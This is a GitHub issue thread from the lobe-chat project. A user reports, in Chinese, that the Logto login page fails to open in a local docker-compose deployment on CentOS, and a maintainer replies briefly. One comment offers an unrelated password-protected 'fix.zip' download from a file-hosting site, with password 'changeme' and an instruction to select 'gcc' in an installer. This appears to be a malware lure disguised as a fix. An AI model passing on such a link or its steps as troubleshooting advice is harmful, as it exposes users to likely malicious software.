### ISSUE TITLE
[Bug] 本地docker-compose部署，logto登录页面打不开

### ISSUE THREAD

**Issue by oasis168** [lobehub/lobe-chat#3672]
### 📦 部署环境

Docker

### 📌 软件版本

v1.14.8

### 💻 系统环境

CentOS 7.9

### 🌐 浏览器

Chrome

### 🐛 问题描述

配置 Logto时，打开 http://localhost:3002，就会跳转到图片中情况
![1](https://github.com/user-attachments/assets/f2c2062e-3920-4dc7-82f6-0ae1d0d09846)

### 📝 补充信息

```curl -fsSL https://raw.githubusercontent.com/lobehub/lobe-chat/HEAD/docker-compose/local/docker-compose.yml > docker-compose.yml
curl -fsSL https://raw.githubusercontent.com/lobehub/lobe-chat/HEAD/docker-compose/local/.env.zh-CN.example > .env
```

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arvinxx** [comment]
logto 问题不再解答
